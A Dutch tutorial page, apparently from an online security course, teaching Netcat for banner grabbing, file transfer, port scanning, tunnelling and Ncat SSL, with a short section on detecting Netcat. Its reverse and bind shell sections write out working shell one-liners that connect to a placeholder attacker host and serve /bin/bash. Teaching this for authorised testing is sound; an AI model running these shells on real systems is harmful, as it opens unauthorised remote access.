Netcat: het Zwitserse zakmes
Gebruik nc voor banners, bestandsoverdracht, port forwarding en eenvoudige reverse shells.
Netcat: het Zwitserse zakmes is een gratis Cyber Security Academy-les op CoddyKit. Dit is les 3 van 4. Je kunt 3 lessen uit dit leerpad gratis volledig lezen — daarna ontgrendelt CoddyKit PRO alle lessen, plus praktische oefeningen met een ingebouwde code-editor en een AI-tutor die 24/7 beschikbaar is. Deze les maakt deel uit van het leertraject Cyber Security Academy. Je voortgang wordt gesynchroniseerd op het web en in de CoddyKit-app. De cursus Cyber Security Academy bevat in totaal 4 lessen.
Wat is Netcat?
Netcat (nc) is een hulpmiddel dat gegevens leest en schrijft via netwerkverbindingen met TCP of UDP. Het is op vrijwel elk Unix-systeem geïnstalleerd en is onmisbaar voor foutopsporing, bestandsoverdracht en eenvoudige uitbuiting.
Basisaansluiting en servicemeldingen uitlezen
Maak verbinding met een TCP-poort om de servicemelding uit te lezen en handmatig met het protocol te werken. Dit is de eenvoudigste vorm van verkenning.
# Connect to port 80
nc 192.168.1.100 80
GET / HTTP/1.0
[Enter twice]
# Connect to SMTP
nc mail.example.com 25
# Returns: 220 mail.example.com ESMTPLuisteren op een poort
Netcat kan met -l -p luisteren naar binnenkomende verbindingen. Dit is nuttig voor het controleren van connectiviteit, het opvangen van reverse shells en het ontvangen van bestanden.
# Listen on port 4444
nc -lvnp 4444
# -l listen
# -v verbose
# -n no DNS resolution
# -p port numberBestandsoverdracht met Netcat
Netcat kan bestanden verzenden door ze via een verbinding door te geven. De ontvanger luistert en stuurt de uitvoer door naar een bestand. Er is geen versleuteling — gebruik dit alleen op vertrouwde netwerken.
# Receiver (runs first):
nc -lvnp 4444 > received_file.txt
# Sender:
nc 192.168.1.10 4444 < file_to_send.txtPoorten scannen met Netcat
Netcat kan eenvoudige poortscans uitvoeren met -z (modus zonder I/O) en -w (time-out). Het is langzamer dan Nmap, maar nuttig wanneer Nmap niet beschikbaar is.
# Scan ports 20-80
nc -zv 192.168.1.100 20-80 2>&1 | grep succeeded
# With timeout:
nc -zvw2 192.168.1.100 22 80 443Eenvoudige reverse shell
Een reverse shell laat het doel verbinding maken met de aanvaller. Dit is nuttig bij penetratieonderzoeken wanneer firewallregels inkomende verbindingen naar het doel blokkeren.
# Attacker listens:
nc -lvnp 4444
# Target executes (bash):
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
# Or via nc:
nc attacker_ip 4444 -e /bin/bashBind shell
Een bind shell luistert op de doelcomputer. De aanvaller maakt er verbinding mee. Dit komt minder vaak voor bij moderne penetratieonderzoeken, omdat firewalls meestal inkomende verbindingen blokkeren.
# On target: listen and serve a shell
nc -lvnp 5555 -e /bin/bash
# On attacker: connect
nc target_ip 5555UDP-modus
Gebruik -u voor UDP-verbindingen. Dit is nuttig voor het controleren van UDP-diensten zoals DNS (poort 53) en SNMP (poort 161).
# Test DNS over UDP
nc -u 8.8.8.8 53
# Test SNMP
nc -u 192.168.1.1 161Proxyverbindingen met Netcat
Netcat kan verbindingen aan elkaar koppelen om via netwerken door te sturen. In combinatie met benoemde pipes (mkfifo) maakt het eenvoudige tweerichtingstunnels zonder extra hulpmiddelen.
mkfifo /tmp/pipe
nc -lvnp 4445 < /tmp/pipe | nc internal_host 80 > /tmp/pipeNcat: het moderne alternatief
Ncat (onderdeel van Nmap) breidt Netcat uit met SSL-ondersteuning (--ssl), toegangsbeheer en broker-modus. Gebruik Ncat bij voorkeur voor versleutelde kanalen.
# SSL listener
ncat --ssl -lvnp 4444
# SSL connect
ncat --ssl target_ip 4444Verdedigers: Netcat detecteren
Netcat-verbindingen zien eruit als normaal TCP-verkeer. Verdedigers kunnen ze detecteren door procesnamen te bewaken (HIDS), ongebruikelijke uitgaande poorten te herkennen en shells te signaleren die door onverwachte ouderprocessen zijn gestart.
Snelle controle
Welke Netcat-vlag schakelt de luistermodus in?
Samenvatting: Netcat
Netcat is een fundamenteel hulpmiddel: gebruik het voor het uitlezen van servicemeldingen, bestandsoverdracht, het controleren van connectiviteit en het begrijpen van de werking van reverse en bind shells. Bij geautoriseerde penetratieonderzoeken controleert het firewallregels en simuleert het hoe een aanvaller zich door netwerken verplaatst. Leer het goed kennen — zowel om het te gebruiken als om het te detecteren.
Leer Cyber Security Academy met een AI-tutor — gratis
Schrijf echte code en voer die uit in je browser, krijg direct hulp van een AI-tutor die 24/7 beschikbaar is en ga verder waar je gebleven bent op het web of in de app.
- Cursussen
- 76
- Lessen
- 303
Veelgestelde vragen
Is de les “Netcat: het Zwitserse zakmes” gratis?
Ja — je kunt hier op het web alle 3 lessen van het leerpad Cyber Security Academy, waaronder “Netcat: het Zwitserse zakmes”, gratis volledig lezen. Daarna ontgrendelt CoddyKit PRO alle lessen, plus interactieve oefeningen met een ingebouwde code-editor en een AI-tutor die 24/7 beschikbaar is. De cursus Cyber Security Academy bevat in totaal 4 lessen.
Wat leer ik in “Netcat: het Zwitserse zakmes”?
Gebruik nc voor banners, bestandsoverdracht, port forwarding en eenvoudige reverse shells. Je oefent met Cyber Security Academy door code rechtstreeks in de browser uit te voeren. Een AI-begeleider die 24/7 beschikbaar is beantwoordt je vragen terwijl je de les doorwerkt.
Heb ik ervaring nodig om met Cyber Security Academy te beginnen?
Ervaring vooraf is niet nodig. Cyber Security Academy op CoddyKit is opgebouwd voor beginners tot gevorderden, zodat je hier of bij het begin kunt starten en in je eigen tempo kunt leren. Dit is les 3 van 4.
Hoe lang duurt de les “Netcat: het Zwitserse zakmes”?
De meeste lessen van CoddyKit duren ongeveer 5–10 minuten. Elke les is kort en interactief, zodat je gestaag vooruitgaat en op het web en in de app precies verdergaat waar je was gebleven.
Kan ik code schrijven en uitvoeren in deze les over Cyber Security Academy?
Ja. Elke les over Cyber Security Academy bevat een ingebouwde code-editor, zodat je rechtstreeks in je browser echte code kunt schrijven en uitvoeren en direct feedback van AI krijgt — lokale installatie is niet nodig.
Alle lessen in deze cursus
- Technieken voor Nmap-poortscans
- Fingerprinting van services en besturingssystemen
- Netcat: het Zwitserse zakmes
- Scripting voor netwerkenumeratie